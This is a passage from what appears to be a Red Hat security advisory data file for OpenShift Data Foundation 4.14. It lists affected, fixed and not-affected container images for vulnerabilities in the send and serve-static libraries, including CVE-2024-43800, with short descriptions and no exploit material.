"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", 